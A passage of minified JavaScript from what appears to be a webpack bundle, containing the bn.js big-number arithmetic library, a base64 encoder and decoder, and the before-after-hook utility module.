w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9742:(Pe,we)=>{"use strict";we.byteLength=function F(M){var p=Q(M),w=p[1];return 3*(p[0]+w)/4-w},we.toByteArray=function g(M){var p,K,D=Q(M),w=D[0],x=D[1],S=new j(function E(M,p,D){return 3*(p+D)/4-D}(0,w,x)),O=0,U=x>0?w-4:w;for(K=0;K<U;K+=4)p=ie[M.charCodeAt(K)]<<18|ie[M.charCodeAt(K+1)]<<12|ie[M.charCodeAt(K+2)]<<6|ie[M.charCodeAt(K+3)],S[O++]=p>>16&255,S[O++]=p>>8&255,S[O++]=255&p;return 2===x&&(p=ie[M.charCodeAt(K)]<<2|ie[M.charCodeAt(K+1)]>>4,S[O++]=255&p),1===x&&(p=ie[M.charCodeAt(K)]<<10|ie[M.charCodeAt(K+1)]<<4|ie[M.charCodeAt(K+2)]>>2,S[O++]=p>>8&255,S[O++]=255&p),S},we.fromByteArray=function y(M){for(var p,D=M.length,w=D%3,x=[],S=16383,O=0,U=D-w;O<U;O+=S)x.push(_(M,O,O+S>U?U:O+S));return 1===w?x.push(de[(p=M[D-1])>>2]+de[p<<4&63]+"=="):2===w&&x.push(de[(p=(M[D-2]<<8)+M[D-1])>>10]+de[p>>4&63]+de[p<<2&63]+"="),x.join("")};for(var de=[],ie=[],j="undefined"!=typeof Uint8Array?Uint8Array:Array,$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ae=0,I=$.length;ae<I;++ae)de[ae]=$[ae],ie[$.charCodeAt(ae)]=ae;function Q(M){var p=M.length;if(p%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var D=M.indexOf("=");return-1===D&&(D=p),[D,D===p?0:4-D%4]}function b(M){return de[M>>18&63]+de[M>>12&63]+de[M>>6&63]+de[63&M]}function _(M,p,D){for(var x=[],S=p;S<D;S+=3)x.push(b((M[S]<<16&16711680)+(M[S+1]<<8&65280)+(255&M[S+2])));return x.join("")}ie["-".charCodeAt(0)]=62,ie["_".charCodeAt(0)]=63},2685:(Pe,we,de)=>{var ie=de(5309),j=de(9597),$=de(7117),ae=Function.bind,I=ae.bind(ae);function Q(_,y,M){var p=I($,null).apply(null,M?[y,M]:[y]);_.api={remove:p},_.remove=p,["before","error","after","wrap"].forEach(function(D){var w=M?[y,D,M]:[y,D];_[D]=_.api[D]=I(j,null).apply(null,w)})}function E(){var _={registry:{}},y=ie.bind(null,_);return Q(y,_),y}var g=!1;function b(){return g||(console.warn('[before-after-hook]: "Hook()" repurposing warning, use "Hook.Collection()". Read more: https://git.io/upgrade-before-after-hook-to-1.4'),g=!0),E()}b.Singular=function F(){var y={registry:{}},M=ie.bind(null,y,"h");return Q(M,y,"h"),M}.bind(),b.Collection=E.bind(),Pe.exports=b,Pe.exports.Hook=b,Pe.exports.Singular=b.Singular,Pe.exports.Collection=b.Collection},9597:Pe=>{Pe.exports=function we(de,ie,j,$){var ae=$;de.registry[j]||(de.registry[j]=[]),"before"===ie&&($=function(I,Q){return Promise.resolve().then(ae.bind(null,Q)).then(I.bind(null,Q))}),"after"===ie&&($=function(I,Q){var F;return Promise.resolve().then(I.bind(null,Q)).then(function(E){return ae(F=E,Q)}).then(function(){return F})}),"error"===ie&&($=function(I,Q){return Promise.resolve().then(I.bind(null,Q)).catch(function(F){return ae(F,Q)})}),de.registry[j].push({hook:$,orig:ae})}},5309:Pe=>{Pe.exports=function we(de,ie,j,$){if("function"!=typeof j)throw new Error("method for before hook must be a function");return $||($={}),Array.isArray(ie)?ie.reverse().reduce(function(ae,I){return we.bind(null,de,I,ae,$)},j)():Promise.resolve().then(function(){return de.registry[ie]?de.registry[ie].reduce(function(ae,I){return I.hook.bind(null,ae,$)},j)():j($)})}},7117:Pe=>{Pe.exports=function we(de,ie,j){if(de.registry[ie]){var $=de.registry[ie].map(function(ae){return ae.orig}).indexOf(j);-1!==$&&de.registry[ie].splice($,1)}}},9423:function(Pe,we,de){!function(ie,j){"use strict";function $(A,v){if(!A)throw new Error(v||"Assertion failed")}function ae(A,v){A.super_=v;var P=function(){};P.prototype=v.prototype,A.prototype=new P,A.prototype.constructor=A}function I(A,v,P){if(I.isBN(A))return A;this.negative=0,this.words=null,this.length=0,this.red=null,null!==A&&(("le"===v||"be"===v)&&(P=v,v=10),this._init(A||0,v||10,P||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(6601).Buffer}catch(A){}function F(A,v){var P=A.charCodeAt(v);return P>=48&&P<=57?P-48:P>=65&&P<=70?P-55:P>=97&&P<=102?P-87:void $(!1,"Invalid character in "+A)}function E(A,v,P){var G=F(A,P);return P-1>=v&&(G|=F(A,P-1)<<4),G}function g(A,v,P,G){for(var X=0,L=0,h=Math.min(A.length,P),R=v;R<h;R++){var J=A.charCodeAt(R)-48;X*=G,L=J>=49?J-49+10:J>=17?J-17+10:J,$(J>=0&&L<G,"Invalid character"),X+=L}return X}function b(A,v){A.words=v.words,A.length=v.length,A.negative=v.negative,A.red=v.red}if(I.isBN=function(v){return v instanceof I||null!==v&&"object"==typeof v&&v.constructor.wordSize===I.wordSize&&Array.isArray(v.words)},I.max=function(v,P){return v.cmp(P)>0?v:P},I.min=function(v,P){return v.cmp(P)<0?v:P},I.prototype._init=function(v,P,G){if("number"==typeof v)return this._initNumber(v,P,G);if("object"==typeof v)return this._initArray(v,P,G);"hex"===P&&(P=16),$(P===(0|P)&&P>=2&&P<=36);var X=0;"-"===(v=v.toString().replace(/\s+/g,""))[0]&&(X++,this.negative=1),X<v.length&&(16===P?this._parseHex(v,X,G):(this._parseBase(v,P,X),"le"===G&&this._initArray(this.toArray(),P,G)))},I.prototype._initNumber=function(v,P,G){v<0&&(this.negative=1,v=-v),v<67108864?(this.words=[67108863&v],this.length=1):v<4503599627370496?(this.words=[67108863&v,v/67108864&67108863],this.length=2):($(v<9007199254740992),this.words=[67108863&v,v/67108864&67108863,1],this.length=3),"le"===G&&this._initArray(this.toArray(),P,G)},I.prototype._initArray=function(v,P,G){if($("number"==typeof v.length),v.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(v.length/3),this.words=new Array(this.length);for(var X=0;X<this.length;X++)this.words[X]=0;var 